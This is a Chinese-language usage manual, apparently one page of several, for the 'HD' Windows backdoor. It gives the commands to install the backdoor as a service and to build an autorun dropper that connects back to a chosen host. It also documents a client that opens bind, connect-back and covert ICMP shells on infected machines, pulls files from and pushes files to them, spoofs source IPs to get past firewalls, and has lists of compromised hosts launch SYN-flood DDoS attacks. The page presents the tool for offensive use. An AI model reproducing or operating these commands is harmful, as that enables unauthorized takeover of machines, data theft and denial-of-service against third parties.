强大的后门工具：HD

 

三. 命令行使用方法介绍
==========================================================================================

1. 查看帮助

使用命令: hd -help / hd -h
帮助信息:
[Usage of Backdoor:]
-create         Create AutoRun file
-install        Install Service
-remove         Remove Service
-start          Start Service
-stop           Stop Service
-update         Update Service

[Usage of Function:]
-b              Backdoor Client
-c              Config Parameter
-d              DDoS Attack
-f              Port Banner Scanner
-g              Ping/Name/SQL/IPC Scanner
-h              Help Info
-m              Command Line SendMail
-o              Show Other Function
-p              Packet Transmit
-s              Socks5 Proxy
-u              Like UNIX su Tool
-x              Sniffer

2. 后门操作

a. 后门安装

使用命令: hd -install

b. 后门启动

使用命令: hd -start

c. 停止后门

使用命令: hd -stop

d. 删除后门

使用命令: hd -remove

e. 更新后门

使用命令: hd -update [Reinstall]
参数解释:
1. 默认将自动识别原来的安装文件路径进行覆盖安装。
2. 如果选择reinstall将删除原来的服务和配置信息。
3. 如果没安装服务将自动用此路径安装服务并运行。

f. 生成自运行文件

使用命令: hd -create [Newfile]
参数解释:
1. 默认将自动识别运行的文件名后添加 _new 作为生成文件的名称。
2. Newfile为指定生成的文件名。
3. 最好压缩后再生成。
使用示例:
D:\>hd -create
Usage of Create AutoRun File: -create [Newfile]

Enter your Door Type <1.ConnectBack  2.DownloadURL 3.HBot>: 1

Enter your ConnectBack Host <IP or Domain>: 10.10.10.222

Enter your ConnectBack Port <1-65535>: 53

Enter your Sleep Time <Minute>: 60

Add Your Config Info in to The File Success.
Please use "HD_new.exe".

3. 后门客户端功能

使用命令: hd -client | hd -b

a. 客户端使用帮助

使用命令: hd -b -h
帮助信息:
[Usage of Door Client:]
-b [Sniffer BindIP]
-b <hosts.txt|TargetIP> <Command> [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 "bind 99"
-b 192.168.0.1 "bind 99" -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 "connect 192.168.0.2 53"
-b hosts.txt   "hgod 192.168.0.2 80"

b. 客户端命令行使用模式（在不必要或者不能交互的情况下使用）

使用命令: hd -b <hosts.txt|TargetIP> <Command> [Option]
参数解释:
1. <host.txt|TargetIP> 为支持IP和IP列表文件两种发送形式，以实现批量处理工作。
2. <Command>为发送的命令，可为后门内置Shell里的任意一个命令及其参数。具体请查看后门Shell帮助信息。
3. SEQ 为后门协议特征包的标识，参数默认为10101，如要后门区分收到的数据包的目的IP是否为本地IP，用10102。
4. SourcePort 为发送数据包的源端口，参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. SendMode 为发送数据包的方式，参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
6. TargetPort 为发送数据包的目的端口，参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
7. SourceIP 为发送数据包的源IP，可伪造为任何IP以掩盖发送数据包的真实IP，如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时，将视发包机器所在的网络设置，对方将可能收不到数据包。
8. ICMPType 为发送数据包的方式为ICMP时的可选项，可为任何ICMP数据包类型，选为目标允许通过的ICMP包可有效突破防火墙。
使用示例:
1. 如果要192.168.0.1机器上的后门监听99端口，发包的方式为TCP，目标开放的端口为80，用如下命令:
hd -b 192.168.0.1 "bind 99" -m:tcp -p:80
2. 如果要让hosts.txt里记录的已经装好后门的机器对192.168.0.1发起SYN拒绝服务攻击，用如下命令:
hd -b hosts.txt "hgod 192.168.0.1 80"

c. 客户端shell模式

使用命令: hd -b [Sniffer BindIP]
参数解释:
1. 多网卡的机器上使用客户端功能时可能需要指定Sniffer绑定的IP，以便Sniffer能正常工作和通讯。
2. 如果不指定IP将自动获取本机的第一个IP作为绑定IP。

d. 客户端shell模式内置命令介绍（按命令次序详细介绍）

使用命令: hd -b [Sniffer BindIP] 进入客户端shell模式。

1. ?

命令解释: 查看帮助信息
帮助信息:

?                  Shell Help
!                  Run a Local Command
A/AUTO             List and Add Auto Control
B/BIND             Bind and Listen a port
C/CLEAN            Clean the Shell log
D/DEL              Delete Auto Control
E/EXCHANGE         Exchange Mode to Shell/SafeShell/ResultShell
G/GO               Do Your Shell Command
H/HELP             Client Command Line Usage Help
K/KICK             Kick the Client
L/LIST             List Shell History
M/LISTEN           Listen for ConnectBack Shell
Q/QUIT             Exit This Program
R/RESET            Reset the Parameter of Packet to Default Value
S/SET              Set the Setting
T/TELNET           Telnet to Other Host
U/TEST             Test Target
W/WHO              Who is Connected

GB/GETBIND         Get the Target Bind Shell
GC/GETCONNECT      Get the Target Connect Back Shell
GS/GETSAFE         Get the Target Safe Shell
GR/GETRESULT       Get the Target Result Shell
GL/GETLISTEN       Get the Listen Shell
SG/SAFEGET         Safe Get File From Target
SP/SAFEPUT         Safe Put File to Target

2. !

命令解释: 运行本地命令
帮助信息:
Usage of Run Command: !<Command>
参数解释:
1. <Command>为
2. 可以在不开新cmd窗口和退出client交互模式的情况下运行本地命令。
使用示例:
1. 如果要列表D盘根目录的文件，用如下命令:
!dir d:\

3. A/AUTO

命令解释: 列举和添加连接自动控制
帮助信息:
Usage of Add Auto: a <IP|DoorID>
参数解释:
1. 如果不用参数将列举出当前的控制记录。
2. <IP|DoorID>　为该控制记录规则适用的IP或者后门ID。
3. 规则的具体内容为set命令里设置的 [a]-[f]条目。

[a] AutoLogin    =  true      // 是否自动登陆后门，默认为登陆
[b] AutoKeep     =  true      // 自动保持连接活动，默认为保持
[c] DoorScript   =  false     // 自动对后门发送脚本，默认为不发送
[d] KeepCommand  =  cd \      // 自动保持连接发送的命令，默认为"cd \"
[e] Script       =            // 自动发送脚本文件路径，默认为空
[f] LogConnect   =  true      // 记录连接信息，默认为记录

注:
a. 后门反连控制可以用于后门的反向连接和溢出的CMDShell的反向连接。
b. 如果Script设为有效的文件，将对所有的CMDShell连接起作用。
c. 如果Script设为有效的文件，同时DoorScript设为真，将对所有的后门反向连接和CMDShell连接起作用。
d. Script文件的内容为若干行命令。每个命令占用一行。
如果要对CMDShell适用的话请用cmd下能用的命令编写。
如果要对DoorShell适用的话可以用任意DoorShell支持的命令编写。
如果要同时都适用的话，请用cmd下能用的命令编写，并在文件的开头加上一个cmd和在文件的结尾加多一个exit。
e. set命令里的全局设置将对不在自动控制条目里的所有连接有效。set命令使用帮助在下面。
f. 该功能主要用于批量溢出的自动控制。
g. AutoKeep为保活连接，在不支持长连接的网络环境下使用或者防止后门反连后因超时退出（默认超时为10分钟）。
如果对DoorShell进行保活连接操作，必须把AutoLogin打开。

使用示例:
1. 如果让所有的CMD Shell连接发送httpget.txt里的脚本，用如下命令:
set script = httpget.txt
2. 如果让所有后门ID为HUC的DoorShell自动执行ddos.txt里的脚本，用如下命令:
set script = ddos.txt
set doorscript = true
auto huc
3. 如果让IP为192.168.0.1的DoorShell反连后自动保持连接，并发送命令"noop"，用如下命令:
set autologin = true
set autokeep = true
set keepcommand = noop
auto 192.168.0.1

4. B/BIND

命令解释: 监听一个端口
帮助信息:
Usage of Bind Port: b <Port>
参数解释:
1. <Port> 参数为1-65535的有效端口。
2. 该功能主要用于代替nc -l -vv -p <port> 。

5. C/CLEAN

命令解释: 清除本地Shell日志

6. D/DEL

命令解释: 删除自动控制条目
帮助信息:
Usage of Delete Auto: d <No|All>
参数解释:
1. <No> 为用Auto命令列举出所有自动控制条目中的那个ID条目编号。
2. <All> 为清除所有的自动控制条目。

7. E/EXCHANGE

命令解释: 切换Shell环境
使用帮助:
1. 当设置了targetip以后，可以用这个在后门客户端Shell/　targetip的SafeShell/　targetip的ResultShell进行切换。
2. safeshell为无连接的cmd shell，第一次在目标使用safeshell时要先输入cmd，以便后门运行一个cmd来执行命令。
同时不使用safeshell时应用exit退出。
3. resultshell为无连接的door shell。

8. G/GO

命令解释: 发送数据包
使用帮助:
1. 当设置了targetip和command以后，就可以对目标用此命令发送数据包。
2. 如果需要可以设置其他参数，参数的范围为[0]-[9]。set命令使用帮助在下面。
3. 程序设置了不能重复发送两次g命令。如果要重复发送，请随便运行一个本地Shell命令再使用g命令。

9. H/HELP

命令解释: 显示Client功能命令行使用的帮助
帮助信息:
Use "\?" for Shell Help

[Usage of Door Client:]
-b [Sniffer BindIP]
-b <hosts.txt|TargetIP> <Command> [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 "bind 99"
-b 192.168.0.1 "bind 99" -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 "connect 192.168.0.2 53"
-b hosts.txt   "hgod 192.168.0.2 80"

10. K/KICK

命令解释: 踢掉反连Shell
帮助信息:
Usage of Kick Shell: k <No|Client|All>
参数解释:
1. <No> 为用W/WHO命令列举出所有Shell条目中的那个ID条目编号。
2. <Client> 为踢掉所有的反连Shell。
3. <All> 为踢掉所有的Shell条目。

11. L/LIST

命令解释: 列举最近运行的80个Shell命令。

12. M/LISTEN

命令解释: 在指定端口监听后门反连
帮助信息:
Usage of Listen for ConnectBack: m <Port>
参数解释:
1. <Port> 参数为1-65535的有效端口。
2. 程序自动设置Rebind参数，重绑定该端口。
3. 该功能用于反连控制模块。
4. Set命令的[a]-[f]条目适用此端口的连接。

13. Q/QUIT

命令解释: 退出客户端Shell模式

14. R/RESET

命令解释: 重置全局参数为初始值

15. S/SET

命令解释: 设置全局参数
帮助信息:
List Setting:
编号|参数名|        |默认/当前值|
============================================
No  Parameter    Op Value
[0] TargetIP     =
[1] SourceIP     =
[2] TargetPort   =  80
[3] SourcePort   =  53
[4] Command      =
[5] Seq          =  10101
[6] SendMode     =  ICMP
[7] ICMPType     =  8
[8] GetResult    =  false
[9] Hostlist     =

[a] AutoLogin    =  true
[b] AutoKeep     =  true
[c] DoorScript   =  false
[d] KeepCommand  =  cd \
[e] Script       =
[f] LogConnect   =  true

Use "Set Parameter Op Value" or "Set No Op Value" for Set the Parameter.
Example:
Use "Set targetip to 192.168.7.1" for set the targetip, etc.
Use "Set 0 = 192.168.7.1" for set the targetip, etc.
参数解释:
1. TargetIP 要发送数据包的目的IP。
2. SourceIP 为发送数据包的源IP。可伪造为任何IP以掩盖发送数据包的真实IP，如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时，将视发包机器所在的网络设置，对方将可能收不到数据包。
3. TargetPort 为发送数据包的目的端口。参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
4. SourcePort 为发送数据包的源端口，参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. Command 为后门Shell支持的任何一个命令及其参数。具体请查看后门Shell帮助信息。
6. Seq 为后门协议特征包的标识，参数默认为10101，如要后门区分收到的数据包的目的IP是否为本地IP，用10102。
7. SendMode 为发送数据包的方式，参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
8. ICMPType 为发送数据包的方式为ICMP时的可选项，可为任何ICMP数据包类型，选为目标允许通过的ICMP包可有效突破防火墙。
9. GetResult 为发送命令后是否要取得执行结果。
10. hostlist 指定为IP列表文件的路径。为支持IP列表文件发送形式，以实现批量处理工作。
11. AutoLogin 为是否自动登陆后门。
12. AutoKeep 为是否自动保持连接活动。
13. DoorScript 为是否自动对后门发送脚本。
14. KeepCommand 为是否自动保持连接发送的命令。
15. Script 为是否自动发送脚本文件路径。
16. LogConnect 为是否记录连接信息。
使用示例:
1. 无参数的S/SET命令将显示当前的全局设置。
2. set设置参数形式为: set 参数 Operate 值 或 set 参数ID Operate 值
3. 如设置目标IP为192.168.0.1可用 set targetip = 192.168.0.1 或 set 0 = 192.168.0.1
4. 设置SendMode为TCP用: set sendmode = tcp 或 set 6 = tcp
5. 设置Command为bind 99用: set command = bind 99 或 set 4 = bind 99 或 set 4 = "bind 99"
6. 设置Autologin为假用: set autologin = false 或 set a = false

16. T/TELNET

命令解释: 连接端口
帮助信息:
Usage of Telnet: t <targetip> <Port>
参数解释:
1. <TargetIP>　参数为要连接的IP 。
2. <Port> 参数为1-65535的有效端口。
3. 该功能主要用于代替nc <ip> <port> 。
17. U/TEST

命令解释: 测试对目标的权限
帮助信息:
Usage of Testing: u <TargetIP>
参数解释:
1. <TargetIP>　参数为要连接的IP 。
2. 如果对方安装了后门，且密码正确的话将返回成功的信息。
3. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
18. W/WHO

命令解释: 列出当前所有反连的用户和所有监听反连的端口

19. GB/GETBIND

命令解释: 获取对方的Bind Shell（监听Shell）
帮助信息:
Usage of GetBindShell: gb <TargetIP> <BindPort>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. <BindPort> 为目标要监听的端口。
3. 发包的参数如SendMode，TargetPort等可以用Set进行设置。

20. GC/GETCONNECT

命令解释: 获取对方的ConnectBack Shell（反连Shell）
帮助信息:
Usage of GetConnectBackShell: gc <TargetIP> <ConnectBackPort> [BonnectBackIP]
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. <ConnectBackPort> 为目标要反连的端口。
3. [BonnectBackIP] 为目标要反连的IP。默认为本机的IP。
4. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
5. 如果反连的IP为本地将自动监听一个端口，如果反连的端口为53，将自动用53的反连控制来控制。

21. GS/GETSAFE

命令解释: 获取对方的无连接加密CMD Shell
帮助信息:
Usage of GetSafeShell: gs <TargetIP>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

22. GR/GETRESULT

命令解释: 获取对方的无连接加密Door Shell
帮助信息:
Usage of GetResultShell: gr <TargetIP>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

23. GL/GETLISTEN

命令解释: 获取监听中的反连Shell
帮助信息:
Usage of GetListen: gl <NO>
参数解释:
1. <NO> 为W/WHO命令列出的反连Shell的ID编号。
2. gl某一个shell以后，可以用return命令返回到客户端的交互Shell中。

24. SG/SAFEGET

命令解释: 无连接文件下载
帮助信息:
Usage: sg <TargetIP> <RemoteFileName> <LocalFileName>
参数解释:
1. <TargetIP> 为要获取文件的目标IP。
2. <RemoteFileName> 为要获取的远程文件路径。
3. <LocalFileName> 为本地要保存的文件路径。
4. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

25. SP/SAFEPUT

命令解释: 无连接文件上传
帮助信息:
Usage: sp <TargetIP> <RemoteFileName> <LocalFileName>
参数解释:
1. <TargetIP> 为要上传文件的目标IP。
2. <RemoteFileName> 为要保存的远程文件路径。
3. <LocalFileName> 为上传的本地文件路径。
4. 发包的参数如SendMode，TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

4. 后门配置功能

使用命令: hd -config | hd -c
使用帮助:
[Usage of Config:]
-c -show
-c -type      <0,1,2,3,4>
-c -id        <DoorID>
-c -port      <BindPort>
-c -url       <DownloadURL> [SleepTime]
-c -cb        <ConnectHost> <Port> [SleepTime]
-c -hbot      <Server> <Port> <Channel> [ChannelPass]
-c -time      <SleepTime>
-c -ip        <SnifferIP>
-c -log       <logfile>
-c -ddostype  <0,1,2,3,4>
-c -ddos      <TargetHost> <TargetPort> <ThreadNum>
-c -sockstype <0,1,2,3>
-c -bind      [ReBindIP] <BindPort>
-c -connect   <ConnectHost> <ConnectPort>
-c -listen    <ConnectPort> <ListenPort>
--------------------------------------------------
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen

上一页  [1] [2] [3] [4] [5] 下一页